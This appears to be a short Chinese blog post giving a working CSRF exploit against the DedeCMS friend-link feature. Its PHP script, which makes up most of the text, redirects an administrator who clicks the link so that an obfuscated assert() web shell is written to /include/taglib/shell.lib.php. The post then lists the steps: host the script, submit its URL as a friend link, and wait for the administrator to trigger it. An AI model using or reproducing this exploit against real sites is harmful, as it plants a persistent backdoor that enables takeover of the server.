dedecms 友链 getshell

目录

csrf getshell

EXP

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);
$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

将 exp 部署在服务器上

申请链接

/plus/flink.php

添加链接 网站填上 exp 的链接

之后等待管理员触发

shell 地址

/include/taglib/shell.lib.php

0%